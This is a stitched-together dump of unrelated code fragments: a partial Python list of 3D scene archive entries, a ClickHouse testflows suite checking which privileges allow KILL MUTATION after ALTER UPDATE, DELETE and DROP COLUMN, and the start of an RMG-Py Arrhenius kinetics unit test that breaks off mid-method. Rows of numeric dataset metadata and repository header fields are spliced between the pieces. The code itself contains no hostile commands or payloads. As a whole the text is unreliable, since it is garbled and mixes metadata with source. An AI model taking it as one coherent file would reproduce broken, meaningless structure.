scenes.append({"name": "ai_053_014", "archive_file": "AI53_014.7z", "asset_file": os.path.join("AI53_014", "AI53_014"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_015", "archive_file": "AI53_015.7z", "asset_file": os.path.join("AI53_015", "AI53_015"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_016", "archive_file": "AI53_016.7z", "asset_file": os.path.join("AI53_016", "AI53_016"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_017", "archive_file": "AI53_017.7z", "asset_file": os.path.join("AI53_017", "AI53_017"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_018", "archive_file": "AI53_018.7z", "asset_file": os.path.join("AI53_018", "AI53_018"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_019", "archive_file": "AI53_019.7z", "asset_file": os.path.join("AI53_019", "AI53_019"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_020", "archive_file": "AI53_020.7z", "asset_file": os.path.join("AI53_020", "AI53_020"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_001", "archive_file": "AI54_001.7z.001", "asset_file": os.path.join("001", "AI54_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_002", "archive_file": "AI54_002.7z.001", "asset_file": os.path.join("002", "AI54_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_003", "archive_file": "AI54_003.7z.001", "asset_file": os.path.join("003", "AI54_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_004", "archive_file": "AI54_004.7z.001", "asset_file": os.path.join("004", "AI54_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_005", "archive_file": "AI54_005.7z.001", "asset_file": os.path.join("005", "AI54_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_006", "archive_file": "AI54_006.7z.001", "asset_file": os.path.join("006", "AI54_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_007", "archive_file": "AI54_007.7z.001", "asset_file": os.path.join("007", "AI54_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_008", "archive_file": "AI54_008.7z.001", "asset_file": os.path.join("008", "AI54_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_009", "archive_file": "AI54_009.7z.001", "asset_file": os.path.join("009", "AI54_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_010", "archive_file": "AI54_010.7z.001", "asset_file": os.path.join("010", "AI54_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_001", "archive_file": "AI55_001.7z.001", "asset_file": os.path.join("001", "AI55_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_002", "archive_file": "AI55_002.7z.001", "asset_file": os.path.join("002", "AI55_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_003", "archive_file": "AI55_003.7z.001", "asset_file": os.path.join("003", "AI55_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_004", "archive_file": "AI55_004.7z.001", "asset_file": os.path.join("004", "AI55_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_005", "archive_file": "AI55_005.7z.001", "asset_file": os.path.join("005", "AI55_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_006", "archive_file": "AI55_006.7z.001", "asset_file": os.path.join("006", "AI55_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_007", "archive_file": "AI55_007.7z.001", "asset_file": os.path.join("007", "AI55_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_008", "archive_file": "AI55_008.7z.001", "asset_file": os.path.join("008", "AI55_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_009", "archive_file": "AI55_009.7z.001", "asset_file": os.path.join("009", "AI55_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_010", "archive_file": "AI55_010.7z.001", "asset_file": os.path.join("010", "AI55_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
| 206.90767 | 280 | 0.558062 | 17,160 | 145,663 | 4.361305 | 0.015152 | 0.165152 | 0.110102 | 0.123864 | 0.832269 | 0.814444 | 0.790981 | 0.769054 | 0.714925 | 0.679115 | 0 | 0.118256 | 0.283387 | 145,663 | 703 | 281 | 207.201991 | 0.598712 | 0.072881 | 0 | 0 | 0 | 0 | 0.470124 | 0.049504 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002062 | 0 | 0.002062 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ce810ff8625c746a038f157ce961a8a2586a3ea5 | 18,218 | py | Python | tests/testflows/rbac/tests/privileges/kill_mutation.py | chalice19/ClickHouse | 2f38e7bc5c2113935ab86260439bb543a1737291 | [
"Apache-2.0"
] | 1 | 2022-02-27T15:21:20.000Z | 2022-02-27T15:21:20.000Z | tests/testflows/rbac/tests/privileges/kill_mutation.py | chalice19/ClickHouse | 2f38e7bc5c2113935ab86260439bb543a1737291 | [
"Apache-2.0"
] | 16 | 2022-02-14T15:53:29.000Z | 2022-03-25T18:39:16.000Z | tests/testflows/rbac/tests/privileges/kill_mutation.py | chalice19/ClickHouse | 2f38e7bc5c2113935ab86260439bb543a1737291 | [
"Apache-2.0"
] | null | null | null | from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@TestSuite
def no_privilege(self, node=None):
"""Check that user doesn't need privileges to execute `KILL MUTATION` with no mutations."""
if node is None:
node = self.context.node
with Scenario("kill mutation on a table"):
user_name = f"user_{getuid()}"
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with user(node, user_name):
with When("I grant the user NONE privilege"):
node.query(f"GRANT NONE TO {user_name}")
with And("I grant the user USAGE privilege"):
node.query(f"GRANT USAGE ON *.* TO {user_name}")
with Then("I attempt to kill mutation on table"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
)
with Scenario("kill mutation on cluster"):
user_name = f"user_{getuid()}"
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with user(node, user_name):
with When("I grant the user NONE privilege"):
node.query(f"GRANT NONE TO {user_name}")
with And("I grant the user USAGE privilege"):
node.query(f"GRANT USAGE ON *.* TO {user_name}")
with Then("I attempt to kill mutation on cluster"):
node.query(
f"KILL MUTATION ON CLUSTER sharded_cluster WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
)
@TestSuite
def privileges_granted_directly(self, node=None):
"""Check that a user is able to execute `KILL MUTATION` on a table with a mutation
if and only if the user has privilege matching the source of the mutation on that table.
For example, to execute `KILL MUTATION` after `ALTER UPDATE`, the user needs `ALTER UPDATE` privilege.
"""
user_name = f"user_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Suite(test=update)(user_name=user_name, grant_target_name=user_name)
Suite(test=delete)(user_name=user_name, grant_target_name=user_name)
Suite(test=drop_column)(user_name=user_name, grant_target_name=user_name)
@TestSuite
def privileges_granted_via_role(self, node=None):
"""Check that a user is able to execute `KILL MUTATION` on a table with a mutation
if and only if the user has privilege matching the source of the mutation on that table.
For example, to execute `KILL MUTATION` after `ALTER UPDATE`, the user needs `ALTER UPDATE` privilege.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Suite(test=update)(user_name=user_name, grant_target_name=role_name)
Suite(test=delete)(user_name=user_name, grant_target_name=role_name)
Suite(test=drop_column)(user_name=user_name, grant_target_name=role_name)
@TestSuite
@Requirements(RQ_SRS_006_RBAC_Privileges_KillMutation_AlterUpdate("1.0"))
def update(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER UPDATE`
if and only if the user has `ALTER UPDATE` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Given("The user has no privilege"):
node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")
with Scenario("KILL ALTER UPDATE without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the user NONE privilege"):
node.query(f"GRANT NONE TO {grant_target_name}")
with And("I grant the user USAGE privilege"):
node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER UPDATE with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the ALTER UPDATE privilege"):
node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
)
with Scenario("KILL ALTER UPDATE with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the ALTER UPDATE privilege"):
node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")
with And("I revoke the ALTER UPDATE privilege"):
node.query(
f"REVOKE ALTER UPDATE ON {table_name} FROM {grant_target_name}"
)
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER UPDATE with revoked ALL privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the ALTER UPDATE privilege"):
node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")
with And("I revoke ALL privilege"):
node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER UPDATE with ALL privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER UPDATE mutation"):
node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")
with When("I grant the ALL privilege"):
node.query(f"GRANT ALL ON *.* TO {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
)
@TestSuite
@Requirements(RQ_SRS_006_RBAC_Privileges_KillMutation_AlterDelete("1.0"))
def delete(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER DELETE`
if and only if the user has `ALTER DELETE` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Given("The user has no privilege"):
node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")
with Scenario("KILL ALTER DELETE without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the user NONE privilege"):
node.query(f"GRANT NONE TO {grant_target_name}")
with And("I grant the user USAGE privilege"):
node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER DELETE with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the ALTER DELETE privilege"):
node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
)
with Scenario("KILL ALTER DELETE with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the ALTER DELETE privilege"):
node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")
with And("I revoke the ALTER DELETE privilege"):
node.query(
f"REVOKE ALTER DELETE ON {table_name} FROM {grant_target_name}"
)
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER DELETE with revoked ALL privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the ALTER DELETE privilege"):
node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")
with And("I revoke ALL privilege"):
node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER DELETE with ALL privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DELETE mutation"):
node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")
with When("I grant the ALL privilege"):
node.query(f"GRANT ALL ON *.* TO {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
)
@TestSuite
@Requirements(RQ_SRS_006_RBAC_Privileges_KillMutation_AlterDropColumn("1.0"))
def drop_column(self, user_name, grant_target_name, node=None):
"""Check that the user is able to execute `KILL MUTATION` after `ALTER DROP COLUMN`
if and only if the user has `ALTER DROP COLUMN` privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with Given("The user has no privilege"):
node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")
with Scenario("KILL ALTER DROP COLUMN without privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the user NONE privilege"):
node.query(f"GRANT NONE TO {grant_target_name}")
with And("I grant the user USAGE privilege"):
node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER DROP COLUMN with privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the ALTER DROP COLUMN privilege"):
node.query(
f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}"
)
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
)
with Scenario("KILL ALTER DROP COLUMN with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the ALTER DROP COLUMN privilege"):
node.query(
f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}"
)
with And("I revoke the ALTER DROP COLUMN privilege"):
node.query(
f"REVOKE ALTER DROP COLUMN ON {table_name} FROM {grant_target_name}"
)
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER DROP COLUMN with revoked privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the ALTER DROP COLUMN privilege"):
node.query(
f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}"
)
with And("I revoke ALL privilege"):
node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
exitcode=exitcode,
message="Exception: Not allowed to kill mutation.",
)
with Scenario("KILL ALTER DROP COLUMN with ALL privilege"):
table_name = f"merge_tree_{getuid()}"
with table(node, table_name):
with Given("I have an ALTER DROP COLUMN mutation"):
node.query(f"ALTER TABLE {table_name} DROP COLUMN x")
with When("I grant the ALL privilege"):
node.query(f"GRANT ALL ON *.* TO {grant_target_name}")
with Then("I try to KILL MUTATION"):
node.query(
f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
settings=[("user", user_name)],
)
@TestFeature
@Requirements(
RQ_SRS_006_RBAC_Privileges_KillMutation("1.0"),
RQ_SRS_006_RBAC_Privileges_All("1.0"),
RQ_SRS_006_RBAC_Privileges_None("1.0"),
)
@Name("kill mutation")
def feature(self, node="clickhouse1", stress=None, parallel=None):
"""Check the RBAC functionality of KILL MUTATION."""
self.context.node = self.context.cluster.node(node)
if parallel is not None:
self.context.parallel = parallel
if stress is not None:
self.context.stress = stress
Suite(run=no_privilege, setup=instrument_clickhouse_server_log)
Suite(run=privileges_granted_directly, setup=instrument_clickhouse_server_log)
Suite(run=privileges_granted_via_role, setup=instrument_clickhouse_server_log)
| 38.84435 | 122 | 0.582391 | 2,271 | 18,218 | 4.535447 | 0.049758 | 0.068155 | 0.062136 | 0.057184 | 0.937379 | 0.921165 | 0.909029 | 0.89233 | 0.881942 | 0.860194 | 0 | 0.003291 | 0.316171 | 18,218 | 468 | 123 | 38.92735 | 0.823487 | 0.059062 | 0 | 0.734568 | 0 | 0 | 0.391427 | 0.020935 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021605 | false | 0 | 0.009259 | 0 | 0.030864 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ceac23eebc660f9e7fa6a16ba3c52c2a70469e04 | 52,705 | py | Python | rmgpy/kinetics/arrheniusTest.py | kblondal/RMG-Py | ee14e35321c1dc3cd1900c6d2ebb27931d1bb542 | [
"MIT"
] | null | null | null | rmgpy/kinetics/arrheniusTest.py | kblondal/RMG-Py | ee14e35321c1dc3cd1900c6d2ebb27931d1bb542 | [
"MIT"
] | null | null | null | rmgpy/kinetics/arrheniusTest.py | kblondal/RMG-Py | ee14e35321c1dc3cd1900c6d2ebb27931d1bb542 | [
"MIT"
] | 1 | 2018-10-03T19:36:40.000Z | 2018-10-03T19:36:40.000Z | #!/usr/bin/env python3
###############################################################################
# #
# RMG - Reaction Mechanism Generator #
# #
# Copyright (c) 2002-2019 Prof. William H. Green (whgreen@mit.edu), #
# Prof. Richard H. West (r.west@neu.edu) and the RMG Team (rmg_dev@mit.edu) #
# #
# Permission is hereby granted, free of charge, to any person obtaining a #
# copy of this software and associated documentation files (the 'Software'), #
# to deal in the Software without restriction, including without limitation #
# the rights to use, copy, modify, merge, publish, distribute, sublicense, #
# and/or sell copies of the Software, and to permit persons to whom the #
# Software is furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in #
# all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #
# DEALINGS IN THE SOFTWARE. #
# #
###############################################################################
"""
This script contains unit tests of the :mod:`rmgpy.kinetics.arrhenius` module.
"""
import math
import unittest
import numpy as np
import rmgpy.constants as constants
from rmgpy.kinetics.arrhenius import Arrhenius, ArrheniusEP, PDepArrhenius, MultiArrhenius, MultiPDepArrhenius
################################################################################
class TestArrhenius(unittest.TestCase):
"""
Contains unit tests of the :class:`Arrhenius` class.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
self.A = 1.0e12
self.n = 0.5
self.Ea = 41.84
self.T0 = 1.
self.Tmin = 300.
self.Tmax = 3000.
self.comment = 'C2H6'
self.arrhenius = Arrhenius(
A=(self.A, "cm^3/(mol*s)"),
n=self.n,
Ea=(self.Ea, "kJ/mol"),
T0=(self.T0, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
)
def test_a_factor(self):
"""
Test that the Arrhenius A property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.A.value_si * 1e6, self.A, delta=1e0)
def test_n(self):
"""
Test that the Arrhenius n property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.n.value_si, self.n, 6)
def test_ea(self):
"""
Test that the Arrhenius Ea property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.Ea.value_si * 0.001, self.Ea, 6)
def test_temperature0(self):
"""
Test that the Arrhenius T0 property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.T0.value_si, self.T0, 6)
def test_temperature_min(self):
"""
Test that the Arrhenius Tmin property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.Tmin.value_si, self.Tmin, 6)
def test_temperature_max(self):
"""
Test that the Arrhenius Tmax property was properly set.
"""
self.assertAlmostEqual(self.arrhenius.Tmax.value_si, self.Tmax, 6)
def test_comment(self):
"""
Test that the Arrhenius comment property was properly set.
"""
self.assertEqual(self.arrhenius.comment, self.comment)
def test_is_temperature_valid(self):
"""
Test the Arrhenius.is_temperature_valid() method.
"""
Tdata = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
validdata = np.array([False, True, True, True, True, True, True, True, True, True], np.bool)
for T, valid in zip(Tdata, validdata):
valid0 = self.arrhenius.is_temperature_valid(T)
self.assertEqual(valid0, valid)
def test_get_rate_coefficient(self):
"""
Test the Arrhenius.get_rate_coefficient() method.
"""
Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
kexplist = np.array(
[1.6721e-4, 6.8770e1, 5.5803e3, 5.2448e4, 2.0632e5, 5.2285e5, 1.0281e6, 1.7225e6, 2.5912e6, 3.6123e6])
for T, kexp in zip(Tlist, kexplist):
kact = self.arrhenius.get_rate_coefficient(T)
self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
def test_change_t0(self):
"""
Test the Arrhenius.change_t0() method.
"""
Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
k0list = np.array([self.arrhenius.get_rate_coefficient(T) for T in Tlist])
self.arrhenius.change_t0(300)
self.assertEqual(self.arrhenius.T0.value_si, 300)
for T, kexp in zip(Tlist, k0list):
kact = self.arrhenius.get_rate_coefficient(T)
self.assertAlmostEqual(kexp, kact, delta=1e-6 * kexp)
def test_fit_to_data(self):
"""
Test the Arrhenius.fit_to_data() method.
"""
Tdata = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
kdata = np.array([self.arrhenius.get_rate_coefficient(T) for T in Tdata])
arrhenius = Arrhenius().fit_to_data(Tdata, kdata, kunits="m^3/(mol*s)")
self.assertEqual(float(self.arrhenius.T0.value_si), 1)
for T, k in zip(Tdata, kdata):
self.assertAlmostEqual(k, arrhenius.get_rate_coefficient(T), delta=1e-6 * k)
self.assertAlmostEqual(arrhenius.A.value_si, self.arrhenius.A.value_si, delta=1e0)
self.assertAlmostEqual(arrhenius.n.value_si, self.arrhenius.n.value_si, 1, 4)
self.assertAlmostEqual(arrhenius.Ea.value_si, self.arrhenius.Ea.value_si, 2)
self.assertAlmostEqual(arrhenius.T0.value_si, self.arrhenius.T0.value_si, 4)
def test_fit_to_negative_data(self):
"""
Test the Arrhenius.fit_to_data() method on negative rates
"""
Tdata = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
kdata = np.array([-1 * self.arrhenius.get_rate_coefficient(T) for T in Tdata])
arrhenius = Arrhenius().fit_to_data(Tdata, kdata, kunits="m^3/(mol*s)")
self.assertEqual(float(self.arrhenius.T0.value_si), 1)
for T, k in zip(Tdata, kdata):
self.assertAlmostEqual(k, arrhenius.get_rate_coefficient(T), delta=1e-6 * abs(k))
self.assertAlmostEqual(arrhenius.A.value_si, -1 * self.arrhenius.A.value_si, delta=1e0)
self.assertAlmostEqual(arrhenius.n.value_si, self.arrhenius.n.value_si, 1, 4)
self.assertAlmostEqual(arrhenius.Ea.value_si, self.arrhenius.Ea.value_si, 2)
self.assertAlmostEqual(arrhenius.T0.value_si, self.arrhenius.T0.value_si, 4)
def test_pickle(self):
"""
Test that an Arrhenius object can be pickled and unpickled with no loss
of information.
"""
import pickle
arrhenius = pickle.loads(pickle.dumps(self.arrhenius, -1))
self.assertAlmostEqual(self.arrhenius.A.value, arrhenius.A.value, delta=1e0)
self.assertEqual(self.arrhenius.A.units, arrhenius.A.units)
self.assertAlmostEqual(self.arrhenius.n.value, arrhenius.n.value, 4)
self.assertAlmostEqual(self.arrhenius.Ea.value, arrhenius.Ea.value, 4)
self.assertEqual(self.arrhenius.Ea.units, arrhenius.Ea.units)
self.assertAlmostEqual(self.arrhenius.T0.value, arrhenius.T0.value, 4)
self.assertEqual(self.arrhenius.T0.units, arrhenius.T0.units)
self.assertAlmostEqual(self.arrhenius.Tmin.value, arrhenius.Tmin.value, 4)
self.assertEqual(self.arrhenius.Tmin.units, arrhenius.Tmin.units)
self.assertAlmostEqual(self.arrhenius.Tmax.value, arrhenius.Tmax.value, 4)
self.assertEqual(self.arrhenius.Tmax.units, arrhenius.Tmax.units)
self.assertEqual(self.arrhenius.comment, arrhenius.comment)
def test_repr(self):
"""
Test that an Arrhenius object can be reconstructed from its repr()
output with no loss of information.
"""
namespace = {}
exec('arrhenius = {0!r}'.format(self.arrhenius), globals(), namespace)
self.assertIn('arrhenius', namespace)
arrhenius = namespace['arrhenius']
self.assertAlmostEqual(self.arrhenius.A.value, arrhenius.A.value, delta=1e0)
self.assertEqual(self.arrhenius.A.units, arrhenius.A.units)
self.assertAlmostEqual(self.arrhenius.n.value, arrhenius.n.value, 4)
self.assertAlmostEqual(self.arrhenius.Ea.value, arrhenius.Ea.value, 4)
self.assertEqual(self.arrhenius.Ea.units, arrhenius.Ea.units)
self.assertAlmostEqual(self.arrhenius.T0.value, arrhenius.T0.value, 4)
self.assertEqual(self.arrhenius.T0.units, arrhenius.T0.units)
self.assertAlmostEqual(self.arrhenius.Tmin.value, arrhenius.Tmin.value, 4)
self.assertEqual(self.arrhenius.Tmin.units, arrhenius.Tmin.units)
